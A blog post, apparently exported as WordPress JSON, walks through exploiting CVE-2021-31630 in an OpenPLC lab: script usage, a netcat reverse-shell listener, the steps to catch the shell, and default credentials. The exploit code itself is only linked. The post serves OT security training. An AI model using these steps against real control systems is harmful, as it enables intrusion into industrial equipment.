{"id":1660,"date":"2025-03-01T10:57:53","date_gmt":"2025-03-01T07:57:53","guid":{"rendered":"https:\/\/zerontek.com\/zt\/?p=1660"},"modified":"2025-03-01T10:58:42","modified_gmt":"2025-03-01T07:58:42","slug":"ot-lab-hacking-openplc","status":"publish","type":"post","link":"https:\/\/zerontek.com\/zt\/2025\/03\/01\/ot-lab-hacking-openplc\/","title":{"rendered":"OT Lab: Hacking OpenPLC"},"content":{"rendered":"\n<p>Having an OT lab is crucial for any OT security practitioner or learner. It\u2019s where you gain practical, hands-on skills that can\u2019t be acquired just by reading documentation or watching videos. Fortunately, setting up an OT lab today is easier than ever, whether you invest in real devices like a PLC or opt for a simulated one with similar functionalities, such as OpenPLC (<a href=\"https:\/\/autonomylogic.com\/\">https:\/\/autonomylogic.com<\/a>).<\/p>\n\n\n\n<p>Today, I\u2019m not going to walk you through setting up a lab\u2014you can refer to projects like <a href=\"https:\/\/github.com\/zakharb\/labshock\">LabShock<\/a> by <a href=\"https:\/\/www.linkedin.com\/in\/zakharb\/?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BmHneQgWoTNGgKU1aNAqktA%3D%3D\" target=\"_blank\" rel=\"noreferrer noopener\">Zakhar Bernhardt<\/a> for that. Instead, I\u2019m complementing his lab by adding an offensive tool that you can use inside the Kali (hacker) machine to communicate with OpenPLC.<\/p>\n\n\n\n<p>So, how do you hack a PLC\u2014in this case, OpenPLC?<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Exploiting OpenPLC WebServer 3: CVE-2021-31630<\/h3>\n\n\n\n<p>While exploring OpenPLC, I came across an existing vulnerability, <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-31630\">CVE-2021-31630<\/a>, which allows remote code execution. A bit of research led me to multiple public exploits, which I modified to fit my lab setup. 
With these adjustments, I was able to get a reverse shell and gain access to the OpenPLC web server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"347\" src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1024x347.png\" alt=\"\" class=\"wp-image-1661\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1024x347.png 1024w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-300x102.png 300w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-768x260.png 768w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image.png 1506w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Proof of Concept (PoC) Exploit<\/h3>\n\n\n\n<p>The following <a href=\"https:\/\/github.com\/selmux\/Alhasawi-ICS-OT-Security-projetcs\/tree\/main\/OT%20Lab\/OpenPLc\/OpenPlc-CVE-2021-31630\">script<\/a> demonstrates how to exploit CVE-2021-31630. 
By executing this, an attacker can inject a payload into the OpenPLC system, leading to a reverse shell.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Usage:<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 OpenPlc-CVE-2021-31630.py -ip &lt;LISTEN_IP&gt; -p &lt;LISTEN_PORT&gt; -u &lt;USERNAME&gt; -pwd &lt;PASSWORD&gt;\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Example:<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 OpenPlc-CVE-2021-31630.py -ip 192.168.1.100 -p 1111 -u openplc -pwd openplc\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Arguments:<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>-ip &lt;LISTEN_IP&gt;<\/code> : The IP address to listen on for the reverse shell (Kali machine).<\/li>\n\n\n\n<li><code>-p &lt;LISTEN_PORT&gt;<\/code> : The port number to listen on.<\/li>\n\n\n\n<li><code>-u &lt;USERNAME&gt;<\/code> : OpenPLC login username.<\/li>\n\n\n\n<li><code>-pwd &lt;PASSWORD&gt;<\/code> : OpenPLC login password.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Exploitation Methodology<\/h3>\n\n\n\n<p>To execute the attack, follow these steps:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Set up a Netcat listener<\/strong> on your attacking machine: <code>nc -lnvp 1111<\/code><\/li>\n\n\n\n<li><strong>Change the base URL<\/strong> in the script to match the OpenPLC address.<\/li>\n\n\n\n<li><strong>Run the exploit<\/strong> : <code>python3 OpenPlc-CVE-2021-31630.py -ip 192.168.1.100 -p 1111 -u openplc -pwd openplc<\/code><\/li>\n\n\n\n<li><strong>Catch the reverse shell<\/strong>\u2014if successful, you will have access to the OpenPLC machine.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Default OpenPLC Credentials<\/h3>\n\n\n\n<p>By default, OpenPLC ships with the following credentials:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Username: openplc\nPassword: openplc\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"669\" height=\"130\" 
src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1.png\" alt=\"\" class=\"wp-image-1662\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1.png 669w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-1-300x58.png 300w\" sizes=\"auto, (max-width: 669px) 100vw, 669px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"711\" height=\"258\" src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-3.png\" alt=\"\" class=\"wp-image-1664\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-3.png 711w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-3-300x109.png 300w\" sizes=\"auto, (max-width: 711px) 100vw, 711px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1012\" height=\"250\" src=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2.png\" alt=\"\" class=\"wp-image-1663\" srcset=\"https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2.png 1012w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2-300x74.png 300w, https:\/\/zerontek.com\/zt\/wp-content\/uploads\/2025\/02\/image-2-768x190.png 768w\" sizes=\"auto, (max-width: 1012px) 100vw, 1012px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Final Thoughts<\/h3>\n\n\n\n<p>I hope you enjoyed this article. 
This could be helpful for practicing pen testing in a simulated environment and learning more about attacker skills.<\/p>\n\n\n\n<p>Feel free to get the exploit from my GitHub where I host OT security tools and guides: <a href=\"https:\/\/github.com\/selmux\/Alhasawi-ICS-OT-Security-projetcs\/tree\/main\/OT%20Lab\/OpenPLc\/OpenPlc-CVE-2021-31630\">Alhasawi GitHub<\/a>.<\/p>\n\n\n\n<p>Happy hacking and keep sharpening your OT security skills!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Having an OT lab is crucial for any OT security practitioner or learner. It\u2019s where you gain practical, hands-on skills that can\u2019t be acquired just by reading documentation or watching videos. Fortunately, setting up an OT lab today is easier than ever, whether you invest in real devices like a PLC or opt for a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1669,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,214,279,283,48,106,67],"tags":[285,7,287,286,6,284,47],"class_list":["post-1660","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security","category-exploits","category-open-source","category-openplc","category-ot-security","category-penetration-testing","category-plc","tag-cve-2021-31630","tag-cyber-security","tag-hack-openplc","tag-hack-plc","tag-ics-security","tag-openplc","tag-ot-security"],"_links":{"self":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts\/1660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/comments?post=1660"}],"version-history":[{"count":4,"hr
ef":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts\/1660\/revisions"}],"predecessor-version":[{"id":1670,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/posts\/1660\/revisions\/1670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/media\/1669"}],"wp:attachment":[{"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/media?parent=1660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/categories?post=1660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerontek.com\/zt\/wp-json\/wp\/v2\/tags?post=1660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}